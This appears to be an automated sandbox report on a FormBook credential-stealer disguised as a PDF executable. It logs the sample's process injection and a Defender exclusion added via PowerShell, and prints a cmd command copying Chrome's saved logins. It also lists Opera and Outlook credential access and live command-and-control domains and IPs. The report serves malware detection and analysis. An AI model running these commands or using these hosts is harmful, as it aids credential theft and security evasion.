          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773CBB64C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF773CBB64C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00E961C0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00E961C0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00E96510 SetUnhandledExceptionFilter,10_2_00E96510

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Windows\explorer.exeNetwork Connect: 203.161.60.191 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80Jump to behavior
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfileJump to behavior
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeMemory allocated: C:\Windows\System32\svchost.exe base: 400000 protect: page execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeMemory allocated: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 400000 protect: page execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeMemory written: C:\Windows\System32\svchost.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeMemory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF722870000 value starts with: 4D5AJump to behavior
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: NULL target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and writeJump to behavior
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: NULL target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeThread register set: target process: 4056Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 4056Jump to behavior
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeSection unmapped: C:\Windows\System32\svchost.exe base address: 400000Jump to behavior
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeSection unmapped: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base address: 400000Jump to behavior
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection unmapped: C:\Windows\SysWOW64\rundll32.exe base address: E90000Jump to behavior
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeMemory written: C:\Windows\System32\svchost.exe base: 400000Jump to behavior
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeMemory written: C:\Windows\System32\svchost.exe base: 401000Jump to behavior
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeMemory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 400000Jump to behavior
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeMemory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 401000Jump to behavior
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeMemory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 30EF008Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF722870000Jump to behavior
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfileJump to behavior
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"Jump to behavior
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeProcess created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user~1\AppData\Local\Temp\DB1" /VJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
          Source: explorer.exe, 00000008.00000002.3754457139.0000000004880000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2276796818.0000000009021000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275947089.0000000009013000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000008.00000002.3751213172.0000000001441000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.1315693106.0000000001440000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000008.00000002.3751213172.0000000001441000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.1315693106.0000000001440000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
          Source: explorer.exe, 00000008.00000000.1314901102.0000000000C59000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3749514616.0000000000C59000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman
          Source: explorer.exe, 00000008.00000002.3751213172.0000000001441000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.1315693106.0000000001440000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: GetLocaleInfoEx,0_2_00007FF773CE8FB0
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: GetLocaleInfoEx,0_2_00007FF773CE9080
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773CBB27C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF773CBB27C

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Specification and Quantity Pdf.exe.26988f33988.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Specification and Quantity Pdf.exe.26988d99cf0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.3748804420.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1377345707.0000000003310000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.3751155179.0000000000D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1377647946.00000000037A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.3751238251.0000000000DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.3749075404.0000000000340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1309964008.0000026988C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Specification and Quantity Pdf.exe.26988f33988.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Specification and Quantity Pdf.exe.26988d99cf0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.3748804420.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1377345707.0000000003310000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.3751155179.0000000000D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1377647946.00000000037A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.3751238251.0000000000DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.3749075404.0000000000340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1309964008.0000026988C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Native API
          1
          DLL Side-Loading
          1
          DLL Side-Loading
          1
          Disable or Modify Tools
          1
          OS Credential Dumping
          1
          System Time Discovery
          Remote Services1
          Archive Collected Data
          4
          Ingress Tool Transfer
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Shared Modules
          Boot or Logon Initialization Scripts1
          Access Token Manipulation
          1
          Deobfuscate/Decode Files or Information
          LSASS Memory2
          File and Directory Discovery
          Remote Desktop Protocol1
          Data from Local System
          1
          Encrypted Channel
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts2
          Command and Scripting Interpreter
          Logon Script (Windows)812
          Process Injection
          3
          Obfuscated Files or Information
          Security Account Manager224
          System Information Discovery
          SMB/Windows Admin Shares1
          Email Collection
          4
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          DLL Side-Loading
          NTDS341
          Security Software Discovery
          Distributed Component Object ModelInput Capture14
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script211
          Masquerading
          LSA Secrets2
          Process Discovery
          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts41
          Virtualization/Sandbox Evasion
          Cached Domain Credentials41
          Virtualization/Sandbox Evasion
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          Access Token Manipulation
          DCSync1
          Application Window Discovery
          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job812
          Process Injection
          Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
          Rundll32
          /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1515401 Sample: Specification and Quantity ... Startdate: 22/09/2024 Architecture: WINDOWS Score: 100 49 www.volkovastyu.com 2->49 51 www.tuktukwines.com 2->51 53 12 other IPs or domains 2->53 67 Multi AV Scanner detection for domain / URL 2->67 69 Suricata IDS alerts for network traffic 2->69 71 Found malware configuration 2->71 73 15 other signatures 2->73 11 Specification and Quantity Pdf.exe 3 2->11         started        signatures3 process4 file5 47 C:\...\Specification and Quantity Pdf.exe, PE32+ 11->47 dropped 79 Writes to foreign memory regions 11->79 81 Allocates memory in foreign processes 11->81 83 Adds a directory exclusion to Windows Defender 11->83 85 2 other signatures 11->85 15 wmplayer.exe 11->15         started        18 powershell.exe 23 11->18         started        20 conhost.exe 11->20         started        22 svchost.exe 11->22         started        signatures6 process7 signatures8 87 Modifies the context of a thread in another process (thread injection) 15->87 89 Maps a DLL or memory area into another process 15->89 91 Sample uses process hollowing technique 15->91 93 Queues an APC in another process (thread injection) 15->93 24 explorer.exe 74 1 15->24 injected 95 Loading BitLocker PowerShell Module 18->95 28 WmiPrvSE.exe 18->28         started        30 conhost.exe 18->30         started        process9 dnsIp10 55 www.jam-nins.com 203.161.60.191, 49715, 80 VNPT-AS-VNVNPTCorpVN Malaysia 24->55 57 shops.myshopify.com 23.227.38.74, 49713, 49714, 80 CLOUDFLARENETUS Canada 24->57 77 System process connects to network (likely due to code injection or exploit) 24->77 32 rundll32.exe 18 24->32         started        signatures11 process12 file13 43 C:\Users\user\AppData\...\95Nlogrv.ini, data 32->43 dropped 45 C:\Users\user\AppData\...\95Nlogri.ini, data 32->45 dropped 59 Detected FormBook malware 32->59 61 Tries to steal Mail credentials (via file / registry access) 32->61 63 Tries to harvest and steal browser information (history, passwords, etc) 32->63 65 5 other signatures 32->65 36 cmd.exe 2 32->36         started        39 firefox.exe 32->39         started        signatures14 process15 signatures16 75 Tries to harvest and steal browser information (history, passwords, etc) 36->75 41 conhost.exe 36->41         started        process17

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          Specification and Quantity Pdf.exe68%VirustotalBrowse
          Specification and Quantity Pdf.exe66%ReversingLabsWin64.Backdoor.FormBook
          SourceDetectionScannerLabelLink
          C:\Users\user\Specification and Quantity Pdf.exe66%ReversingLabsWin64.Backdoor.FormBook
          No Antivirus matches
          SourceDetectionScannerLabelLink
          www.jam-nins.com11%VirustotalBrowse
          volkovastyu.com5%VirustotalBrowse
          shops.myshopify.com0%VirustotalBrowse
          www.supremeajock.biz5%VirustotalBrowse
          www.1690.biz6%VirustotalBrowse
          www.sdnaqianchuan.com0%VirustotalBrowse
          www.volkovastyu.com1%VirustotalBrowse
          www.tuktukwines.com4%VirustotalBrowse
          www.maximsboutique.com7%VirustotalBrowse
          www.parkpeninsula.online8%VirustotalBrowse
          www.playdoapp.online10%VirustotalBrowse
          www.taxuw.com0%VirustotalBrowse
          www.ancientshadowguilt.space1%VirustotalBrowse
          www.395boulderbrookdr.com0%VirustotalBrowse
          SourceDetectionScannerLabelLink
          http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#0%URL Reputationsafe
          http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#0%URL Reputationsafe
          https://mozilla.org0/0%URL Reputationsafe
          http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z0%URL Reputationsafe
          http://ocsp.sectigo.com00%URL Reputationsafe
          http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl00%URL Reputationsafe
          https://sectigo.com/CPS00%URL Reputationsafe
          http://www.maximsboutique.comReferer:0%Avira URL Cloudsafe
          https://api.msn.com:443/v1/news/Feed/Windows?t0%Avira URL Cloudsafe
          http://www.taxuw.com/n7ak/www.jam-nins.com100%Avira URL Cloudmalware
          http://www.tuktukwines.com/n7ak/www.playdoapp.online0%Avira URL Cloudsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%Avira URL Cloudsafe
          https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world0%Avira URL Cloudsafe
          https://api.msn.com:443/v1/news/Feed/Windows?0%Avira URL Cloudsafe
          https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed8810%Avira URL Cloudsafe
          https://api.msn.com:443/v1/news/Feed/Windows?t0%VirustotalBrowse
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%VirustotalBrowse
          https://www.msn.com/en-us/weather/topstories/here-s-who-could-see-above-average-snowfall-this-winter0%Avira URL Cloudsafe
          https://api.msn.com:443/v1/news/Feed/Windows?0%VirustotalBrowse
          http://www.395boulderbrookdr.com/n7ak/0%Avira URL Cloudsafe
          http://www.tuktukwines.com/n7ak/www.playdoapp.online6%VirustotalBrowse
          http://www.playdoapp.onlineReferer:0%Avira URL Cloudsafe
          https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed8810%VirustotalBrowse
          https://excel.office.com0%Avira URL Cloudsafe
          http://www.volkovastyu.com0%Avira URL Cloudsafe
          https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-0%Avira URL Cloudsafe
          http://www.supremeajock.biz/n7ak/www.1690.biz100%Avira URL Cloudmalware
          http://www.maximsboutique.com/n7ak/www.tuktukwines.com100%Avira URL Cloudmalware
          https://deff.nelreports.net/api/repX0%Avira URL Cloudsafe
          http://www.1690.biz/n7ak/0%Avira URL Cloudsafe
          https://excel.office.com0%VirustotalBrowse
          http://www.volkovastyu.com1%VirustotalBrowse
          http://www.supremeajock.biz/n7ak/100%Avira URL Cloudmalware
          http://www.395boulderbrookdr.com/n7ak/1%VirustotalBrowse
          http://www.395boulderbrookdr.comReferer:0%Avira URL Cloudsafe
          https://api.msn.com/v1/news/Feed/Windows?activityId=DD4083B70FE54739AB05D6BBA3484042&timeOut=5000&oc0%Avira URL Cloudsafe
          http://www.supremeajock.biz/n7ak/5%VirustotalBrowse
          https://wns.windows.com/0%Avira URL Cloudsafe
          http://www.gameofgem.com/n7ak/0%Avira URL Cloudsafe
          http://www.1690.biz0%Avira URL Cloudsafe
          http://www.ancientshadowguilt.space0%Avira URL Cloudsafe
          http://www.1690.biz/n7ak/1%VirustotalBrowse
          http://www.maximsboutique.com100%Avira URL Cloudmalware
          http://www.playdoapp.online/n7ak/www.taxuw.com0%Avira URL Cloudsafe
          http://www.playdoapp.online/n7ak/0%Avira URL Cloudsafe
          http://www.ancientshadowguilt.space/n7ak/0%Avira URL Cloudsafe
          http://www.ancientshadowguilt.space1%VirustotalBrowse
          https://word.office.com0%Avira URL Cloudsafe
          http://www.gameofgem.com/n7ak/6%VirustotalBrowse
          http://www.thehandycrewcompany.com0%Avira URL Cloudsafe
          http://www.playdoapp.online/n7ak/8%VirustotalBrowse
          http://www.tuktukwines.com0%Avira URL Cloudsafe
          http://www.ancientshadowguilt.space/n7ak/1%VirustotalBrowse
          https://wns.windows.com/0%VirustotalBrowse
          https://word.office.com0%VirustotalBrowse
          https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%Avira URL Cloudsafe
          http://www.jam-nins.com/n7ak/www.sdnaqianchuan.com0%Avira URL Cloudsafe
          http://www.goodstuff.tv/n7ak/0%Avira URL Cloudsafe
          http://www.thehandycrewcompany.com8%VirustotalBrowse
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark0%Avira URL Cloudsafe
          http://www.tuktukwines.com4%VirustotalBrowse
          http://www.sdnaqianchuan.com/n7ak/www.parkpeninsula.online0%Avira URL Cloudsafe
          https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%VirustotalBrowse
          http://www.tripskorea.com/n7ak/www.gameofgem.com0%Avira URL Cloudsafe
          https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew0%Avira URL Cloudsafe
          http://www.jam-nins.com/n7ak/www.sdnaqianchuan.com14%VirustotalBrowse
          http://www.1690.biz6%VirustotalBrowse
          http://www.goodstuff.tv/n7ak/1%VirustotalBrowse
          https://outlook.com0%Avira URL Cloudsafe
          http://www.parkpeninsula.online0%Avira URL Cloudsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark0%VirustotalBrowse
          http://www.sdnaqianchuan.comReferer:0%Avira URL Cloudsafe
          http://www.thehandycrewcompany.comReferer:0%Avira URL Cloudsafe
          http://www.parkpeninsula.onlineReferer:0%Avira URL Cloudsafe
          https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp0%Avira URL Cloudsafe
          http://www.parkpeninsula.online8%VirustotalBrowse
          https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the0%Avira URL Cloudsafe
          https://outlook.com0%VirustotalBrowse
          http://www.ancientshadowguilt.spaceReferer:0%Avira URL Cloudsafe
          http://www.maximsboutique.com/n7ak/100%Avira URL Cloudmalware
          http://www.goodstuff.tv0%Avira URL Cloudsafe
          https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew0%VirustotalBrowse
          https://api.msn.com/v1/news/Feed/Windows?0%Avira URL Cloudsafe
          https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp0%VirustotalBrowse
          http://www.jam-nins.com0%Avira URL Cloudsafe
          https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua0%Avira URL Cloudsafe
          http://www.tuktukwines.com/n7ak/?OrT4vp=D48xOFEPf6J&nrCxNDk=X95XYDcr/0ovQl8dFDDB2DmtDdbecE+v1errdqyRv2syAHM7RuOPKheDNorHxKs8v8dmbSYlDw==0%Avira URL Cloudsafe
          https://api.msn.com/v1/news/Feed/Windows?0%VirustotalBrowse
          http://www.taxuw.comReferer:0%Avira URL Cloudsafe
          http://www.jam-nins.comReferer:0%Avira URL Cloudsafe
          http://www.goodstuff.tv1%VirustotalBrowse
          http://www.maximsboutique.com/n7ak/5%VirustotalBrowse
